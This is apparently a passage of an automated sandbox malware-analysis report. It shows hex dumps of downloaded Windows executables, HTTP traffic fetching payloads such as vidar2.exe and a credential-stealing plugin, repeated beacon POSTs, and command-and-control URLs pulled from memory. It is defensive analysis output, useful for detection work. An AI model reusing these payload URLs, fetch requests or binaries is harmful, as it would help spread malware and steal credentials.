00 00 00 00 00 00 00 00 30 04 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 80 8f 03 00 a0 00 00 00 00 f0 03 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 50 29 00 00 80 5f 03 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 5f 03 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 5c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 76 e7 02 00 00 10 00 00 00 e8 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 44 9d 00 00 00 00 03 00 00 9e 00 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 4c 44 00 00 00 a0 03 00 00 18 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 f0 03 00 00 02 00 00 00 a2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 50 29 00 00 00 00 04 00 00 2a 00 00 00 a4 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 13 Dec 2022 19:09:14 GMTContent-Type: application/octet-streamContent-Length: 129024Last-Modified: Tue, 13 Dec 2022 14:34:04 GMTConnection: keep-aliveETag: "63988d5c-1f800"Accept-Ranges: bytesData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e a1 0b 01 02 19 00 9c 01 00 00 58 00 00 00 00 00 00 78 aa 01 00 00 10 00 00 00 b0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 02 00 00 04 00 00 00 00 00 00 02 00 01 00 00 00 00 00 00 00 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 f0 01 00 4f 00 00 00 00 e0 01 00 26 0e 00 00 00 20 02 00 00 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 e0 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 90 9a 01 00 00 10 00 00 00 9c 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 b4 13 00 00 00 b0 01 00 00 14 00 00 00 a0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 e1 09 00 00 00 d0 01 00 00 00 00 00 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 26 0e 00 00 00 e0 01 00 00 10 00 00 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 65 64 61 74 61 00 00 4f 00 00 00 00 f0 01 00 00 02 00 00 00 c4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 e0 1d 00 00 00 00 02 00 00 1e 00 00 00 c6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 14 00 00 00 20 02 00 00 14 00 00 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 40 02 00 00 00 00 00 00 f8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                              Source: global trafficHTTP traffic detected: GET /vidar2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: kikangalaassociates.com
                              Source: global trafficHTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29158.8; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 3592Host: login.live.com
                              Source: global trafficHTTP traffic detected: POST /ppsecure/deviceaddcredential.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29158.8; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 7598Host: login.live.com
                              Source: global trafficHTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29158.8; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 3592Host: login.live.com
                              Source: global trafficHTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29158.8; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 4740Host: login.live.com
                              Source: global trafficHTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29158.8; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 4740Host: login.live.com
                              Source: global trafficHTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29158.8; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 4740Host: login.live.com
                              Source: global trafficHTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29158.8; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 4682Host: login.live.com
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://iglyuyotce.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 270Host: r3oidsofsios.com
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://csigrnv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 201Host: r3oidsofsios.com
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sigiagum.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 126Host: r3oidsofsios.com
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rdpcbv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 226Host: r3oidsofsios.com
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://arfujedsl.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 324Host: r3oidsofsios.com
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nvtalqe.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 354Host: r3oidsofsios.com
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bprujbtf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 128Host: r3oidsofsios.com
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ecaapsyol.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 133Host: r3oidsofsios.com
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xmhgchsawe.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 311Host: r3oidsofsios.com
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qmwhbha.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 111Host: r3oidsofsios.com
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hhqusu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 151Host: r3oidsofsios.com
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nvtkvayro.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 126Host: r3oidsofsios.com
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://aroxyrayv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 277Host: r3oidsofsios.com
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ufutmn.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 360Host: r3oidsofsios.com
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gomlgu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 243Host: r3oidsofsios.com
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mqmkmifvh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 188Host: r3oidsofsios.com
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://okpnuoeb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 215Host: r3oidsofsios.com
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://prhgrykwf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 203Host: r3oidsofsios.com
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://umgkkbyv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 297Host: r3oidsofsios.com
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bljwplujsw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 123Host: r3oidsofsios.com
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jqdieq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 142Host: r3oidsofsios.com
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qrlpwddo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 134Host: r3oidsofsios.com
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hmsoq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 307Host: r3oidsofsios.com
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rwsblto.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 228Host: r3oidsofsios.com
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ikihxohlb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 145Host: r3oidsofsios.com
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sdeypctxsi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 291Host: r3oidsofsios.com
                              Source: global trafficHTTP traffic detected: GET /fusa/bibar.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 31.41.244.228
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jenhfc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 364Host: r3oidsofsios.com
                              Source: Joe Sandbox ViewASN Name: AEROEXPRESS-ASRU AEROEXPRESS-ASRU
                              Source: Joe Sandbox ViewASN Name: LVLT-10753US LVLT-10753US
                              Source: Joe Sandbox ViewIP Address: 185.246.221.151 185.246.221.151
                              Source: Joe Sandbox ViewIP Address: 185.246.221.151 185.246.221.151
                              Source: gntuud.exe, 00000015.00000003.499113255.0000000000C1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.79/fb
                              Source: gntuud.exe, 00000015.00000003.498981390.0000000000C04000.00000004.00000020.00020000.00000000.sdmp, gntuud.exe, 00000015.00000002.785970616.0000000000C07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.79/fb73jc3/Plugins/cred64.dll
                              Source: gntuud.exe, 00000015.00000003.498981390.0000000000C04000.00000004.00000020.00020000.00000000.sdmp, gntuud.exe, 00000015.00000002.785970616.0000000000C07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.79/fb73jc3/Plugins/cred64.dllXIK
                              Source: gntuud.exe, 00000015.00000002.786384130.0000000000C14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.79/fb73jc3/index.php
                              Source: gntuud.exe, 00000015.00000003.499244475.0000000000C39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.79/fb73jc3/index.php?scr=1
                              Source: gntuud.exe, 00000015.00000002.787565484.0000000000C39000.00000004.00000020.00020000.00000000.sdmp, gntuud.exe, 00000015.00000003.499244475.0000000000C39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.79/fb73jc3/index.php?scr=1T)
                              Source: gntuud.exe, 00000015.00000003.499244475.0000000000C39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.79/fb73jc3/index.php?scr=1l&
                              Source: gntuud.exe, 00000015.00000002.787565484.0000000000C39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.79/fb73jc3/index.php?scr=1t&
                              Source: gntuud.exe, 00000015.00000003.499113255.0000000000C1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.79/fb73jc3/index.phpF
                              Source: gntuud.exe, 00000015.00000002.786658213.0000000000C1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.79/fb73jc3/index.phpM
                              Source: gntuud.exe, 00000015.00000002.785290818.0000000000BF4000.00000004.00000020.00020000.00000000.sdmp, gntuud.exe, 00000015.00000003.499661889.0000000000BF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.79/fb73jc3/index.phpa
                              Source: gntuud.exe, 00000015.00000002.786384130.0000000000C14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.79/fb73jc3/index.phpcu
                              Source: gntuud.exe, 00000015.00000003.499037932.0000000000C14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.79/fb73jc3/index.phpg
                              Source: gntuud.exe, 00000015.00000003.499037932.0000000000C14000.00000004.00000020.00020000.00000000.sdmp, gntuud.exe, 00000015.00000002.786384130.0000000000C14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.79/fb73jc3/index.phpqu.
                              Source: gntuud.exe, 00000015.00000003.499037932.0000000000C14000.00000004.00000020.00020000.00000000.sdmp, gntuud.exe, 00000015.00000002.786384130.0000000000C14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.79/fb73jc3/index.phpwu$
                              Source: gntuud.exe, 00000015.00000002.786658213.0000000000C1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.79/fbfb73jc3/index.php
                              Source: 8F68.exe, 0000000C.00000000.404562471.0000000000C42000.00000004.00000001.01000000.00000009.sdmpString found in binary or memory: http://95.217.27.105:80
                              Source: explorer.exe, 0000001F.00000002.776413883.0000000003441000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://go.mail.ru/search
                              Source: explorer.exe, 0000001F.00000002.776413883.0000000003441000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://nova.rambler.ru/search
                              Source: explorer.exe, 00000011.00000000.405174014.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000012.00000002.775161398.0000000001090000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.413703435.0000000000EE0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000013.00000002.779312783.0000000000B57000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000000.417309353.0000000000530000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000016.00000002.775858605.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.420551387.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 0000001A.00000002.780502207.0000000003377000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001F.00000000.426593885.0000000003450000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000022.00000000.429438818.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000026.00000000.432495432.00000000004E0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000026.00000002.777038253.0000000000650000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000028.00000000.435504290.0000000000530000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://r3oidsofsios.com/
                              Source: explorer.exe, 00000011.00000000.405174014.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000012.00000002.775161398.0000000001090000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.413703435.0000000000EE0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000013.00000002.779312783.0000000000B57000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000000.417309353.0000000000530000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000016.00000002.775858605.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.420551387.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 0000001A.00000002.780502207.0000000003377000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001F.00000000.426593885.0000000003450000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000022.00000000.429438818.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000026.00000000.432495432.00000000004E0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000026.00000002.777038253.0000000000650000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000028.00000000.435504290.0000000000530000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://r3oidsofsios.com/Mozilla/5.0
                              Source: explorer.exe, 0000001F.00000002.776413883.0000000003441000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://search.aol.com/aol/search
                              Source: explorer.exe, 0000001F.00000002.776413883.0000000003441000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://search.yahoo.com/search
                              Source: explorer.exe, 0000001F.00000002.776413883.0000000003441000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.google.com/search
                              Source: 8F68.exe, 0000000C.00000000.404562471.0000000000C42000.00000004.00000001.01000000.00000009.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199443972360
                              Source: 8F68.exe, 0000000C.00000000.404562471.0000000000C42000.00000004.00000001.01000000.00000009.sdmpString found in binary or memory: https://t.me/ttruelive
                              Source: 8F68.exe, 0000000C.00000000.404562471.0000000000C42000.00000004.00000001.01000000.00000009.sdmpString found in binary or memory: https://t.me/ttruelivehttps://steamcommunity.com/profiles/76561199443972360http://95.217.27.105:80hi
                              Source: unknownDNS traffic detected: queries for: r3oidsofsios.com
                              Source: C:\Users\user\AppData\Local\Temp\9545.exeCode function: 14_2_00DD42B0 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,
                              Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
                              Source: global trafficHTTP traffic detected: GET /vidar2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: kikangalaassociates.com
                              Source: global trafficHTTP traffic detected: GET /fusa/bibar.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 31.41.244.228
                              Source: global trafficHTTP traffic detected: GET /fb73jc3/Plugins/cred64.dll HTTP/1.1Host: 62.204.41.79
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49689
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49690 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49684 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49682 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
